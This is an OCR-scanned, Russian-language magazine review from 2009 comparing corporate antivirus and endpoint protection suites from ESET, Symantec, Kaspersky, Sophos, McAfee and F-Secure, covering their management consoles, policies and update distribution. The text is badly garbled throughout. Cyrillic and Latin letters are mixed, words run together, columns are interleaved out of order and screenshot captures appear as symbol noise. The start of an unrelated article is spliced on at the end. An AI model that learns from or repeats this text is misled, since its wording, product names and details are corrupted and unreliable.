компонентами как из состава 5MBE, такидеск-
топныхверсий аНТИВИруСОЕ NOD32.
Обновление антивирусных баз осуществляет-
.. ся централизованно с Енутреннего сервера,
что позволяет сэкономить на трафике, не
загружая внешний канал.
I Полнофупкциональнаясистема,ностроенная
.. HaSMBE, включает четы
еe составляющие.
Неносредственно за безонасность клиентских
МНОГИХТИПОЕ ЕИРУСОВ, распространяемых
таким способом. Модуль ThгeatSense может
интегрироваться в популярные почтовые КJIИ-
енты (MS OutIook, OudookExpt'ess, Windows
Mail и др.) Реализовано 'гри режима иастройки
правил фильтрации:
• аDтоматичеCIШЙ;
• интерактивный;
• централизованный на основе политик.
Вноследнем С:JIучае все неразрешенные
трирование, указав в одноименной вкладке
соответствующие настройки. для управления
всей сетью 5MBE используется графическая
консоль ЕР,А Сопsоlе (ЕНАС) -довольно
простой в использовании и, ктомуже,локали-
зованный инструмент. С его НОМОlЦЬю можно
вынолнять удаленную установку и удаление
модулей Smart Security, настраивать парамет-
рысканирования, создать зеркало обновлеиий
и установить периодичность и порядок переда-

станций и серЕеров отвечает SmarrS есиrity.
Его основным компоненrом является хорошо
.. - зарекомендовавший себя антнвнрусный мо-
дуль, примеияемый и надесктопных версиях
NOD32, в котором использована технология
I ThIeatSense.
ТhrеаrSепsесочетаетсигнатурныйанализ
со сложной н сбалансированной системой
расширенного эврнстического анализа кода
(Аdvапсеd Нешistiсs), прн котором использует-
ся связка ДЕУХ методов -эмуллция и алгорит-
мичеCIШЙ анализ пассивной эвристики, что в
итоге обеспечнвает высокий процент обнару-
I жения неИзDестных угроз при низком нороге
ложных срабатываний. Кроме того, в состав
Smart Security ВКJIючен МОдУль нерсонального
администратором соединения будут заблоки-
рованы.
Немаловажио и наличие функции защиты ОТ
сиама. Сообщения сканируются па основе нра-
вил, байесовского анализа или по глобальной
базе оmечатков.В соответствиис нолучеиной
оценкой подозрительныеписьма перемеща-
ются Е папку, созданную по умолчанию илн
указанную нользователем. Пользов ате.ль
может самостоятельно квалифицировать
сообщения,
Непосредственное взаимодействие и управ-
ление КJIиентCIШМИ системами осуществляет
ESET Remote Access Selver (ЕRЛ Server, ERAS).
Именно он выдаетвсе запросы на нроверку,
обновленне, производитнастройкии собнрает
чи данных междуЕRAS. В консоли отображает-
ся информация о состоянии клиентов, список
задач, журналы угроз, брандмауэра, собьгтий и
сканера. Таюке следует о rметить информатив-
ную систему отчеТОЕ.
SYMANTEC ENDPOINT
PROTECTION Пакет Sуmапtес Епdроiпt
Рrotесtiоп 11.0 (SEP) ориентирован на защиту
систем в комнаниях разного размера и объеди-
няетв одном решении несколько технологий,
обеспечивающих нолноценную защиту систем
отугроз всемирной наутины. Основные фун-
кЦИИ заключены в КJIиенте SymaHrec Епd роiпt
Ргоrесt:iоп Сliепr (SEPC). Его версиидоступны
для большогоколичества ОС ­ Windows 2000/

-~I
брандмауэра.Он заменяетштатныйфайрвол информациюо текущемсостоянииклиен- ХР /2003/Vista/2008 (32/64 бита), Liпuх (Red

1I ~126 х.АКЕР 0611261 09


Hat Enrerprise Linux, SпSЕ LinuxEnteI]Jrise
Server/Desktop, Novell Ореп Enterprise Server,
UЬшnU и Debian 4.х), а таюкеVМWare ESX.
SЕРСЯRляется лоrnческим продоmкением
NortonAnbVirus и обеспечиваетЗaIД»туот
вирусо,В и пшнонскихпрограммКЭJ( методом
СШ'натурногоанализа,ТЭJ(И ЭВРИСТИJ<ой.
МодульПРОЭJ<:ТИвнойзащиты, получивший
название Proactive ThreatScan, обнаружи­
ваетвирусы,щ,lТающи:есяпроникнyrьв
систему, основываясьпа анализе поведения
приложениЙ.Реализованазащи:та от спама
(anti-spam) и филЬJ'Рацияинтерпет-трафИJ<а
(web-filtering). Администраторполучаетв
руки инструмент, позволяющийконтролиро­
вать и при необходимостиблокироватьдоступ
НOIIЬЗователейИ программк определепным
процессам, файлам и каталогам, а таюке
отслеживатьРaзJIИ'ПlЫеэлементыОС и при­
ложeIIИЙ. КлиентскиеKoмnoHeнты
защшцены
от модификациии удаления; предусмотрена
X".AN;EP 06 /126/ йУ
возможностьих автоматическоговосста­
новленияи перезanyска.ТехнологияTamper
Proteetion не позволяетВЬJЮIIOЧИТЬсерверные
НЮIИеlrrскиесервисылюбымспособом,втом
числе и через «ДиспеТ'lерзадач». Технология
Generic Exploit Blocking nОЗJ30ляет останав­
ливать и блокироватьугрозы, ИСПОJIЬ3YIOщи:е
уязвимости приложений, а инструментVxMS
(Veritas Mapping Service), имеющийдоступ на
более низкий сиcтeмныйровень,,способен
обнаружитьи удалитьруткит.
Купив ДОПОJJНительнуюлицеизию,можно
aкnmироватьмодуль Symantec NеtwогkЛссеss
Сопtrol, обеспечивающийпроверкусистемпа
паличиепоследнихобновленийи состояние
средствзащиты (актуальностьбаз, версииПО)
и определяю!цийнаоспове полученны:хан-­
НbI:X права доступак сети и ресурсам.СИ<:темы
с отключеннымБРандМауэроми С необнов­
леннымиaнrи:вируснымибазамимогутвыйти
ТQJJЬKOв карантиннуюзону, чтобы произвести
» S··tN/ACK
действия по устранению всех проблем.
Но это еще не все. В клиент вcrpоеп персо­
нальный БРандМауэр, КОТОрЫЙ обеспечивает
функци.и фильтрации КЭJ( открытого, так и
шифрованногосетевого трафИJ<З. Предус­
мотрена возможностьанализаnередаваемы:х
данныхпа уровnе nриложений: администра­
тор можетсамОСТОJl'Гельносоздавать правила
Д)lЯ системы HIPS (Host Intrusion Рlеventiоп
System).
Все настройкикл:иентовхранятсянасервере
УпРавления,установка которогодостаточно
простаи состоит из пяти шагов. При неболь­
шом количествеклиентов (до 100) можноис­
пользоватьвстроеннуюБД (на основе Sybase).
Иначе-можноподключитьсяк MS SQL
2000sp3/2005. Следуетпомнить,ЧТОДJlЯуста­
новки серверауправленияпотребуетсяпали­
чие ПS. ДJIЯ централизованноговводакоманд
и контролясостоянияЮIИентовиспользуется
копсольSymaIJtec Endpoint Proteetion Manager
(SЕрМ),для установкикоторой(каки сервера)
потребуетсякомпьютерс Win2kи выше. По
окончанииустановкисерверазanyскается
мастерперено<.'аи раЗJ3ертьшanил.он помо­
жет создатьустановочныепакеты и развер­
нуть антивируспа КЛИeнтcJ<ИХсистемах, а так­
женерепестипOJlИТИJ<Ии прочиенастройкис
родительскихсерверовSуmапteсAntiVjrus.ДJIЯ
пе WindOWS-IIЛатформустановкавозможна
только вручную, при помощитак называемого
«пеуправляемого»клиента (который,кстати,
тожеуправляетсяИЗ КОНСОЛИ).
подключенныIeклиеlrrыразБИ1!аIOТСЯна
групnы,ДJlЯKOТOpbI:Xустанавливаютсясвои
полиТИКИ.Всего пред усмотренопять ТЮIов
политик:
• антивирус;
• БРандМауэр;
• защита от вторжений;
• обповления (LiveUpdate);
• централнзованны
иcклIoченил (CeIJtralized
Exceptions).
Настроекмного, ОЕШдостаточпоnонятныI'
хотя некотороевремя па освоение SEpM потра­
тить всеже придется. При определении задач
можно использовать шаблоны. впечатляет
большое количество доступных OТ'IeTOB и
сводок - по риску, про веркам, угрозам, ауДIПy
ит.д.OТ'Iе·rыможноoтnравлятьnоэлектрон­
ной почте.
Также ОThlетим наличие понятной утилиты

Д)lЯ резервирования и восстановления базы
данны:х сервера, содержащей все установки.
КASPEiRSКY TOTAL SPACE
S ЕСURIП Решение KasperskyTotal Space
Security CКTSS),вьтускаемое<<Лабораторией
Касперского»,предназначеноДJlЯ защи:тысети
JПобого маcmтабаИ соcroитизнескQлы<ихом-­
понентов. На рабочихL'ТaIЩИЯXи серверах,
иодлежащи:хзащиге,устанавливаетсяспеци­
ализированнаяверсияантивируса,причем
cnнcoK поддерживаемыхСИL'Тем и приложений
весьма большой:рабочиестанции (W'mdows,
Linux), моБильныIeСИL'Темы (Windows Mobile,
~127
":- ":- .::-
••
.....' ...... ,', 1-· ....··
Q I I~~ ~J~

~iI.sophos Enterprise Manager - [Console Root\E."1 L.brary {GRlI1'DERS\SOP";;SEt1)}

~ ~OHCOIЬ l1eiiстеие ~HA \'[збpaнJ-Iee hibrary 1001< ~I<JЮ Q1paвкa

D Con,ole Root
ЕМ library (GR1NDERS\50phosEM) Properties
8-Ц1~ ЕМ Ubrary
f-~ мesще l.OQ
I~HB Package<
~. Primary рагеп! ISecondary рагеп! ] pa,enl is lhe 'oca~on ',от

~ Links
!-·1tI
r-1tI
АП
UlISubscribed
111 select the default parent for thi< Ibrary,

• Сайт компании ESEТ , r-1tI

1 '-1tI
SubrojbOO
РuЫ<hеd
r. ~~~ Ih1:tp://еs-lаtest-З.soрho<.сomjuрdаl :::J ~-'---'--
arJl.

- WV\'W.eset.com.
;_.Q Сеntr al1n<ta11ations r цос path Iпonе\ ~rowse ...
• Сайт «Лаборатории ~..Ii!) Sd1edu1es
KaenepcKoro» - www. ! Waste Ып
kaspersky.ru.
• Сайт компании ackaget.
«Доктор Веб» - www.
drweb.eom.
,kstа~ОП$ аnd gloups о'
• Сайт компании
Symantec - _Vf.У:Ш.,
;?)'ffii2.0 tec.eom.
• Сайт компании
Sophos-www
.S...Q.P.hо'i..ШШ.
• Сайт компании :::..
MeAfee-www
OТ1'leнa
mcafee.com.
• Сайт компании
jNo scheduled updates
F-Secure - www.f­
seeure.ru. УПРАВЛЕНИЕ ПОДКЛЮЧЕННЫМ КЛИЕНТом В ERA CONSOLE

Syrnbian), файловые серверыI (Wmdows, Linux, Samba,
NetWare). Так, клиенгАнтивирусКасперского для Windows
Workstations совместим со всеми версиями Windows, вклю­
чая 64-битные, и обладает всеми возможносгямл, которые
мыпривы:кливидетьвпродуктахзтогоразработчика:
в KasperskyAdrn.inisttation Кit объедИЮJЮТСЯ в логическую
сеть. При автоматическом формированиилогической
сети она совпадает с физической, но затем системы можно
сгрyrшиpовать по своим критериям. Каждая группа ШlИ
отдельный компьютер может иметь свои политики и

~ dvd • проактивная защита; настройки, что обеснечивает тонкую наСТрОЙ1<уподлюбые

На прилагаемом • защита файловой системы; условия. Установка ПРШlожений осущеСТRJlЯется нри по­
к журналу диекеты • брандмауэр, контролирующий в)(одящие и исходящие мощи консOlШ или используя возможностилюбой другой
найдешь видеоролик, соединения с фупrщией ШS/IPS; системы централизованнойустановки ПО (например,
в котором познако­ • зam;итаэлектронной ноч1ы и веб-трафика; Active Directory).
мишься с работой • антифншингиантиспам.
Следуетотметить развитую системуувеДОМl,!ений(обнару­

в Dr.Web Enterprise для настройки параметров работы клиенгскихверскй,

жение вируса, устаревlIШебазы ит.д.), которые могут быть
Suite. а та кже бонус­ обновлений баз и модулей программыиспользуется
отправленыно электронной почте или с помощью NetSend.
ную етатью «Пропуск Kaspersky Adrn.inistration Кit, состоящий из трех компо­

на корпоратив" HeкrOB, которые можно установить на разныхомпьюте­ SOPHOS ENDPOI'NT SЕСURIП АНО
с обзором Kaspeгsky рах. ХранениеJПЩензий, настроек, управление работой CONTROL 8ПродукткомnанииSорhоs-Sорhоs
Enterprise Space атетов и сбор ШIформации осуществляется па сервере Endpoint Security and Control8 таюке состоитиз нескольких
Security и DrWeb администрирования. Возможна одновременная работа частей, каждая из которыхотвечаетза свой участокрабо­
Enterprise Suite. в одной сети нескольких серверов администрирования с ты. Клиенгскаячасть,доступнаяпод разные ОС, включаетв
Ролике настройкой поддержкой иерархии. себя антивнрусSophosAnti-Virus, персональный бранд­
системы антивирус­ Администратор производит все настройки, подключив­ мауэр Sophos ClientFirewall. Отдельподоступен клиент
ной защиты Kaspersky I1Шсь к серверупри помощи консоли:, которая предстaRJIЯет управлениядоступом SOpllOS NetworkAccess Control. NAC
En te rprise Spaee собой оснасткуММс. Взаимодействие между сервером обеспечивает возможность управления сетевым доступом
Security ищи на диске администрирования н клиетским антивирусным ПРШlо­
клиенто!) н карантин, а также контроль над подключе­

капрельскомуномеру жением обеснечивает специальный агенг.

ниемустройств, вроде USВ-флеmек. Технология SOpllOS
Iза 2009 год. Установка ОТДеЛЬНЫJ( компонетов достаточно проста (на
Application Control позволяеткокrролироватьустановку
диске к апрельскому номеру ] [за 2009 год найдеlПJ>видео­
и использованиенежелательныхпрограмм, в том числе и

рOlШКС настройкойКasperskyEnterpriseSpace Sеcurity).Для ТaJ<ИX, KaJ< игры, IМ, VoIP, Р2Р. Sophos HIPS обеспечивает
небольшогоофнсав качествеSQL-сервераможно вз.ять на обнаружение и защиту от еще неизвестныхугроз. Решения
стрamщезагрузкипродуктов «J1абораторииКасперского» для защиты электроиной ночты
и борьбы со спамом SOpllOS
специалыryюверсию MSDE2000 SРЗ для Administration Кit. Ешэil Sесш:ityапd Control также придется устанавливать
Во времяустановкиона будет обнаруженаа:втом.атически. отдельно. Поддерживаются:клиекrскиеплатформы
Консоль администраторалокализованаи понятнав Windows от 98 доVista,MacOS Х, *nix,NetWare.
работедаже без обращениякдокуменгации.Все клиенты клиентыIринимаютTкоманды с серверауправления

• 128 ХАКЕР 06/126/ 09

 » SYN/ACK

fШ==:шшii:!!CG:!II!!Е!=- Ii;;;;======:"·"1!~--..J>JiI

~-~i~~Ф~@-";'I: ;'" Qfю, - ," "=', -'------------~~I

!~ ПРо6Н~Pl8ер(.'"•. sуmапtес ... Endpolnt prDlKHonMilna~er ~ ~ ~ ibIZII;:
1'"'
~
~~~~L~~ ~ -----1 ~"""'CI_
'~.J
~-<> "м,.,."" f.i~
~ I
~~.~,.:' ~il.
-".
!
i
i
-е UNlJ:lsсф!:Q
!jStbsCrW
-SpUjIbl
(O~~ jht~lfJоэ-lIIt&Я-з.SЩIhМ.С(:l"lIДopdа:::J ~OCC2js.•. 1 ~ I
I-QСеГФ.=llnd:еlВ:Юпs r !JNCpolh IM~"\. f:rr)..;.;;~. I O~~

~\!:IScheduIK
--@Wasbab:n

--_.iI
О {p~'''''o.
ult
~(r
~JIV'8C101

'<тI><>ir=т ••
_
'-'-,,·_'

С- - - - ­
]Г:;~:;;;:;;:-I
--- ,-~~

!р ~ IleGlo~,""''':''-.....
rc._.""",~.~_._ .I е...-; .. ,"",~.~~~.~.!

Q.r.-. __.......

P'1No/.",

P'1!">~,,,",.r,.,.,'"''''
,,~~,~-., •. ~, ~,·'V"·=·_.'
"
__ ~
~....e _ r_ _ Qo;_~"'" '1
--~-==:.:=---_._---------­ ~ 1
~~ ...

КОНСОЛЬ ЕМ LIBRARY ПОЗВОЛЯЕТ ГИБКО ЗАДАТЬ

СЕРВЕРЫ ОБНОВЛЕНИЙ НАСТРОЙКАШАБЛОНАСКАНИРОВАНИЯ,в КОНСОЛИ
SYMANTEC ENDPOINT PROTECТION

«'ПРОГРАММУУСТАн,овки Политики по умолчанию требуют вмешательства, так как обнару­

женные вирусы блокируются, но не удаляются, а весь сетевой трафик
КЛИЕНТА МОЖНО ЗАПУСКАТЬ немедленно запрещается. Некоторые имеющиеся политики разреше­

но изменять, другие можнолишь переопределить нри помощи новой

ТРАДИЦИОННЫМ ОБРАЗОМ политики. Вообще говоря, настройка политик по-своемуинтересна:

админнстратор создает наборы для разных компонентов, азатем акти­
ИЛИ ВОСПОЛЬЗОВАВШИСЬ вирует их методом dгаg'п'dгор. Поэтому сразу после установки следует
создать новые наСТрОЙIШ и распределить их потруппам. Реализована
ВОЗМОЖНОСТЯМИ ENTERPRIISE синхронизация с Active Directory- на все вновь подключившиеся сис­
темы автоматически распространяются обноменные настройки.
CONSOLE. УПРАВЛЕНИЕ В случае обнаружения опасности администратор ПOJrучает наглядное
уведомление в виде изменения УРОDНЯ риска, параллеJ1ЬНО отсылает­

В КОНСОЛИ РЕАЛИЗОВАНО ся e-mail, а на клиентской системе об угрозе предупреждаетвсщ!ыва­

ющееокно.

ПУТЕМ ПРИМЕНЕНИЯ ПОЛИТИК

MCAFEE TOTAL PROTECTION SERVI'CE
КIГРУППАМ КОМПЬЮТЕРОВ». ADVAN С Е DВ последнее время активно развиваются решения
класса SaaS СSесtlгitу-аs-а-Sеrviсе, «Безопасность как услуга»), где все
заботы о развитии инфраструктурызащить! берут на себя разработчи­
ки систем, потребитель получает готовое решение.
(Мапаgеmепt Server), нолучающеговсе настройкиС консолей Sophos Таlше проДУКть!Достаточнопро сты В управлении, не требуют вьтде­
Епtегрrisе Console и Sophos NAC Сопsоlе (в последней версии оиа таюке ленного сервера и ориентированыв первую очередь на компании

интегрирована в Епtегргisе Console). Еще один комнонент- библиоте­
ка ЕМ Libгary (Епtегргisе Manager) - обеспечивает загрузку оБНОI3JIе­
ний баз и комнонентов всех антивирусов Sophos на всех ноддерживае­
мыхплатформах.ДJщ удобства обслуживанияв большихсетях можно
установитьнесколько серверов С ЕМ Library. При зтом администратор
недостатком.
небольшого размера, в том числе, без штатного админа. Возможностей
настройки здесь меньше, чем в показанныхвышерешениях, но в той
сфере, на которую они рассчитаны, в этом, наверное, и нет необходи­
мости. Минимум установок можно считать скорее достоинством, чем

может задать два parent-сервера (primary и sесопdагу)для обновлеиия,

Пакет МcЛfее Tota! Proteetion Service Аdvапсеd (МcЛfее TPSA) является
указав URL или UNC адрес. Рекомендуется размещение ЕМ Library в
наиболее оспащенным вариантомлинейкн МсАЕее TPS. Он включает
демилнтаризованнойзоне, а при использовании NAC- в зонелечеюm
антивирусные модули для серверов и клиентов, персональный бранд­
(remediation zопе), куда неренанравл.яются системы, не нрошедшие
Mayэp' обнаружение и блокиропкунекоторыхтипов атак, иснользу­
проверку Sophos NAC и не допущенные В общую сеть.
ющих перенолнение буфера, средства борьбы со спамом и защиты
Все серверные компонентьr находятся в едином установочном файле, и
электронной ночты от вирусов, защиту для браузера.
при необходимости во время инсталляции можно отобрать требуемые
В качестве клиентских системноддерживаются Wiп2k Рго SРЗ, WinXP
компоненты.
и Vista (последнне - 3 2 и 64 бита), серверные- Windows от 2k Server
ДJщ установки сервера нонадобится MSDE, который идет В комплекте,
SРЗ дО 2k8. Кроме того, ТPS в большинстве сценариев поддерживает
ЮIИ MS SQL Server 2005.
серверы терминалов.

Программуустановкиклиента можно запускатьтрадиционнымобра­

Чтобы попробовать TPS в работе, достаточно заполнить форму на сайте
зом или воспользовавшисьвозможностямиЕпtегргisе Сопsоlе.
проекта. После получения подтверждения но e-mail, переходим но ссыл­
Управление в консоли реализовано путем применениянолитикк груп­
Ke на веб-узел SесuгitуСепtег, проверяем системы на совместимость и
пам компьютеров.В группы объедиюrются компьютеры,к которым
вынолнение всех требований. так, для Iпtеrпеt Explorer должен быть
планируетсяприменить одинаковые настройки безопасности. Мастер
задан средннй или высокий уровень безопасности. Другая ссьrлка со­
поиска новых систем позволяетуказать сеть или диапазон IР-адресов, а
держит URLдляустановки Total Ргоtесtiоп. Здесь следует использовать
таюке использоватьАсtivеDrrectory.
только IE 5.5 SP2 и выше, а при адмющстрировании нерейтина Орега

ХАКЕР 06/1261 09 ~129

 » SYN/ACK

~~ КОнсоль AeНCTBhe 8нll 01010 Справка

'ф> оф I ffJfi]1 ~ ~ I х ~ ПlJ,! @ I

,. KaspetSky Administr-5tion Kit
B":'~ Сер6ер aAI'V1HHCTpHpoвaH~ w Ioc~lhost
~... ~ Состоянне юЩНТЫ I Tнn 3.А""" l' )1.." .. , I ПРНJIоженн.
I!J.. r.:J Сеть; Дом.""' ~Эа4ача "OnуЧения обновленнН ... Г1олучеЮ1е обновленнй Сервером ... K,spers'кy Adninistт.tionКiI:
В .. ,Грулпы
Ф У.aartеннаяустановка npиооження У.lI.аne.ннQЯ упаноеха npнложекня Kaspersky A_tr.,tlon K~
. г'@ nOЛН1""'"
i··.. @ Групповые :Jадачн
1..,·, ~ Серверы аДМНННСТрИрО8ання
$-с GLJUK
!В·е MSНOМE
!!J'81 WORKGROIJP Iif. ПроемотоеТ"Ь Q'Р.'ЗУJ1l:-таты
·..-60бнОЭJ1....,.
Jani:J'-IН
Свойства: У дапе"ная YCTtlI10UJH't Пр1':Л()Ж ш:RI
:~ ..~ ~·долеl-/Ная устано&::а

% Про,:",отреть H':;CТpIJH"H ~.l!QЧН РасП><Сание У_oмneни. КnиeнrCl<.ие lC.oМnbIarepbl l'

;.... ~O"'вTы

8-. Вы60РКН КОМПЬЮ'Теров: ~ 0&10~Yb Общн. НастрoW;.и 1 У"етная запись

J :.... "...... компьютеры
СО СТЬТУСйМ 'Кpt'lТМ4ео::нй'
CnpeBKa
~ КОМПЬЮl'еры со статусом 'npe.дynpe*дoe
:е;
{§} )Удаленная ~cтaНQ8l(,a приложенНА
j ,.n. HOВble компьютеры е се'!,", ()а СУЦН)
ф"f$ СоБЬm1Я ПРИlЮжение: IKasp...ky дdminj,~.lioп,К~

i i"@ В"" roбbmt>

! !-@ КРИП1ЧiВCJ>1o't6со6ытня Тип :JaQ,а"М lУдаленная yCf.att08Кд npиnoжения

j._@ OT~a}ы ФУН":Цl1Qннрое:at1НЯ

Со"",.""
. !..-@ ГlpеАУпр."'А.....А 05.03.200918:46:11
I ~""@ инфорI'lсщно'нны
8 соо6щеl1ИЯ Последняя КОМО"";>: j3апgстIПЬ 8 nS_ОЭ.20ОЗ 18:4
! ,-.@ СоБЬ,тмя "УА"".
!.w~ 'ГЛоб~J1bные ,ад~чн
И"""""",,, О Заверше"о: 1
j.... ~ л!1uе~нонны
e I'V1toчн
B~ •.., >:раНlo'U'lнща
О~аетвыrюлнения: О Завершен. с ошн6кой: О

j... -6"j КlIpaHTHH Пpиocrа.НОВflена:

L.. '1 Резервное храНt'lJ1I1Ш6 Выпоnняет~ Pe~J1bТoarbl

3an-~cтwrb Остановить I Гlрtюс-rаrюеиrь I Во:зо6fiCSИТЬ I

~1
!J \ Глобальные зада.ч.., Л CTaнAapTНbl11 I

УДАЛЕННАЯ УСТАНОВКА nРИЛОЖЕНИЯ в KASPERSKY ADMINISTRAТlONЮТ

и~и Firefox, Скачиваем sеtuр-файл н устанавливаем его. для инcrа~­ пользователя,активируютсяКЛЮ'm, выставляютсяпредупреждения.

ляции на остальных системах администратор отправляет сообщение
по е-шаil, содержащее спецнальную ссьику на файл (URL-метод).
Собственно по эгому признахуклиентские системы и сопос:тавляются
конкретному логину,
AгeHTTPS защищает систему, работая в фоновом режиме и вынолЮIЯ
все операции автоматически. Хотя при необходнмости пользоваТeJlЬ
может вмешагьсяв процесс, выполнив проверку файла или обиовление
баз вручную, Системы с работающим TPS отправляют на центральный
сервер данные о своем состоянии и обнаруженных угрозах, где они
становятся доступны администратору в виде
для централизованиого упраR~ения системами и получения OГJeTOB
администратор подключается к Network ОрегаtiопsСепtег (WWW.
mcafeeasap,com), используяе-шаil и пароль, введенный при регист­
рации, Окно NOC содержит пять вкладок, но, в ОТЛИ'Iне от агентов,
нелокализовано,В основной вкладке Sеспгity Сentегноказаночнсло
клиептскихсиcrем,их состояние, данные по защите и иснользованию
лицензий. Сами компьютерысобраны во вкмдке«Соmрutеrs»,где
их можно отобрать по разнымхарактеристикам.Вкладка «Repons»
содержит семь шаблонов отчетов. Все компьютеры распределяются по
группам, JCaЖДая из которых использует назначенную еЙнOl,ЩТИКУ. Эти
Н8crрОЙКИДОС'LyrJНывовк~адке«Gгоuрs
списке присутствует только одиа политика -
OT'IeToB.
+ Policies». После установки в
«Default Policy». Обпов­
В полигикепо умолчанию«Оп-Demand» сканирование незадействова­
но - все настройки брандмауэра производит пользователь, а Оп -access
сканирование архивов и SiteAdvisor для браузера отклю'IеныI. Эти
настройки неудобны, Например, брандмауэр «не знает» системные сер­
висы и при первой загрузке задает много вопросов, ПользоваТeJlЬ, сделав
неправи~ьны.й выбор, может запрос:то заБЛOlсироватьсеБе выход в Сеть
RЛИДОСТУП к опреДeJIенным сервисам. Позтомулучше создать пову:ю
политику, выбрав «Add Policy», где, неремещаясь но BK~aдкaм, включить
Оп-Dеmand сканирование, а затем в настройкахбрандмаузравместо
«User сопfigЩ'еs firewall» выбрать <<Аdministrаto!'сопfigurеs бгewаll».
Обновления ска'Iиваются с цeHтpa~ЬHOГO сервера; реег-tо-реепех­
нология Rumor позволяет системам, нахоДЯщимсяв локальной сети,
обмениватьсяобновлениямидруг с другом, экономя трафнк, Работает
Rurnогоченьнросто. Система, подключившиськ NOC, обнаруживает
оБНОR~ения и рассьmает по локалке широковещательныезапросы,
чтобы нроверить их налИ'Iие на других системах, Если другие агенты
имеют старую версию, то система скачиваетоБНОR~ениеи устанав­
ливаетего. Следующий агент, обнаружив новую версию, поcryпает ана­
ЛОГИ'IНО, но теперь ему отвечает компьютер в ЛОКiJJIьной сети. Третьему
компьютеруобновлениепреР.~ожатужедвесистемы, в дальпейшем
процесс идет по нарастающей, Аналогично обновляются системы, не
имеющие выхода винтернет.

ление политик на клиентских стапцияхнроисходит одновременно прн

подключении к серверу {по умолчанию-обновление раз в12 часов). F-SECURE PROTECTIOIN SERVJICE FOR
Наконец, во вкладке "Му Account>, вынолняется настройкапрофюrя В USINESS Продукт от компании р- Secure - Ргоtесtiоп Service

~ 130 ХАКЕР 06 /1261 09

 » SYN/ACK

МсАfи" I
Total Protection" Servke I 5ecurityCenter

" v МУ.Ц"СОllJl\ V Hel()

Save

Add PoJicy

Poliey !l<Jme: I
"- ----'

\IIП\5 ProtectjoB
ОеskЮI) fiге''l/эll Bro~,ser Pro\ection (SitеА(МS{)f~j A(Mltlced Setti.1gs

Sllyware Protectioll Statlls

~>On

Oif

SpY".'are ProtectioB Mo(le

~, RelJOn (00 ,юl bIock polenlially Ul1,VЭIНеd I)rograms, bu! гесого wl1al woulo hэуе Ьее'1 block~_d)

II
I
@ РГOlщl1 (ask the userv,hal 1000 if polenfialll' UПV1Эl11ed рmgГЭlnS аге. detecled)
"
О Protect (quа,апtiпе all polenlially Ul1'иаn1ео programs)

~~'"'''' '"9'''''
СОЗДАЕМ НОВУЮ ПОЛIИТИКУВ MCAFEE TOTAL PROTECТlON SERVICE ADVANCED

fOT Business (PSB) -распростраНJJетсл в двух версиях: StaHdaTd и

Advanced. Клиентская часть PSB Wотkstаtiоп, предназначенная для
защиты рабочих станций и серверов, работающих нод управлени­
ем Windows, содержит средства защиты от вирусов и шпионского
ПО, поиска руткитов, нредотвращенюtвторжений, КОНТРОЛJJ

активности нриложений и спама, а 'Fакже нерсональный брандма­

yэp. Централнзованноеуправление нроизводнтся через интернет
"­
при помощи интерактивного портала, размещенного на серверах

F-Sеспге. Отдельной системы для установки сервера не требуется, а

сам портал доступен излюбого места в любое время через веб-брау­ --,_
_ .._ _
tt}'l(lor'(_ _ • ...::_

__ __
~
~ ~ .._. _"7
' , . ,... _ , . . " " ... ""',.. . . .....,.,._

-......,.,.",...--~-~.,...,~
_ . _. . . .T_ .... _
..... " , ...... _ ' " . _ . , . _
_w_ ._._roo*_.
-:.,_ . .
"""'lDUlIo.:cnoo>a:'"

CO_,.
~"""""'"

зер. Интерфейс унравления достаточно нрост и локализован. ....

,~·

:::-e..:...~=::-_~~=~::;,.."':r~,.,~_._~«f 0.:_

Для регистрации на нортале потребуется код НОДПИСJ{И

OZ":'(_ _.... ~.-.:........._ . " '....... _~.... А ......
~LI~"""' ..... .....
~,. IUОп>:.""._

===::::::.-='.;:;.,~~=.:.~";'=~:.-' Ос,­
(sпЬsстiрtiоп code), который также иснользуетсяпри активации ==:::::::::.:,':,;;-=:.:::,:..м:-...:::=.;,;-.w.--.,--.оn--'I 0.:,_
_ _,_,,--,,,,........--;a .... • ....._ ... ...._ ..

клиентов. Инсталляцнонныепакеты PSB Wогkstаtiоп стаНОВJJТСЯ

~(o" .... ,oo1~, А""',.,... ~

=~·~.::.=..-~~==.:.":=:T::·.:'::~=>Т.
доступны после регистрации. После ввода кода клиентская система

станет видна в ОJ{Ие управлеRИЯ. Настройки унрощаются за счет

=::=.:;:'::=~-=':"=:~~~_" ...
"",.",(III/'МjI_ _ 'OJ"Щ,,"~"'''''''''''''_'''''''''''''_''-'_'_'''''_'''_'
.................- . . " . , . , . ...." ........ O"I""O..,....... _ ~ ,..

__ "'''+:-_u''"I\;
(;00:-,. _ _ ......",

)._~""""'_~T
c..,r_·H......... eq

......

иснользования профилей. ИзначRЛЬНО доступно семь предустанов­

ленных профилей для различных тинов систем (1- профильдля ''''.;. . .(I ... ~F·SECU.E·

сервера, 2 - для ноутбуков, 4- ДЛJJ офисных машин). Обновление

ПРОФИЛИ БЕЗОПАСНОСТИ В F-SECURE PSB
баз нронсходит также с серверов F-Secure, но командуна обновле­ ПОЗВОЛЯЮТУПРОСТИТЬНАСТРОЙКУ
ние получает только один клиент, который затем и распространяет
их в локальнойсети.
тные клиеНТClше системы, следует обратить внимание на нроду:кты
ЗАКЛ ЮЧ ЕНИ Е Несмотряна, казалосьбы, схожиефункции, от Symапtеси Kaspersky Lab. В ESET NОDЗ2 можно отметить удобную
продуктыразныхнронзводителейсильно разлнчаютсямежду собой. консоль и низкие системные требования к управляющему серверу.
По возможностямклиента я бы вьщелЮ! Sophos, имеющий функции Из SaaS-решенийя бы вьщелил F-Secure PSB, в KO'I:0POM управление
контроля надприложениями, но, к сожалению, средства Ema..il и NAC реа/JИзованодостаточнопросто, подключениеагентов вынолняется

придеТCRустэнэвливать отдельно. Тем, у кого в сети - разношерс- прозрачно,а интерфейсполностьюлокализован.:х:

ХАКЕР 06 /,26/ 09 ~ 131

 >::. units
..:
НЕКОТОРЫЕИЗ НАШИХС ТО50,Й КОЛЛЕГ-I{ОМП:ЬЮТЕРЩИКОВСЧИТАЮТ,ЧТО РЕАЛЬН!АЯ
ЖИЗНЬ ОТЛИЧАЕТСЯХОРОШЕИ ГРАФИКОИ,НО В ЦЕЛО~ ХРЕНОВЫМСЮЖЕТОМ.ИНЫЕ
ИЗ НИХ ОКАЗЫВАЮТСЯНЕДОВОЛЬНЫДДЖЕ ГРАФИКОИ...
Именнотак' Пусть не
о
тормозит но и яркости
никакой - эффекты
отражений JYсклые
красивые взрывы и прочие
фейерверки встреча ются редко а
разные многоцветные голограФи­
ческие фигуры фракталы и гало
найти почти liевозможно. В рамках
этой статьи продолжающей
